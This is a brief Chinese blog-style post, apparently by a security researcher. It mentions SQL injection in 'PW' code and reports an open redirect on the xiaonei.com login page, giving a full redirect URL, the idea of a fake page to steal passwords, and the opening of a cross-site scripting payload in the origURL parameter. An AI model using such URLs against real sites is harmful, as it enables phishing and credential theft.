云舒
前几天看了下PW的代码,注射那是很多的,不过剑心达人已经开始发了,难道也要连发一个星期?呵呵。BTW,今天去校内看东西的时候,发现xiaonei登陆也有URL转跳的问题,不过我老觉得这个不算漏洞,或许可以做个页面来骗人偷密码吧。http://login.xiaonei.com/Login.do?rf=r&origURL=http%3A%2F%2Fwww.icylife.net%2Fyunshu
早上还以为仅仅是转跳,没想到还可以跨站,呵呵。http://login.xiaonei.com/Login.do?rf=r&origURL=">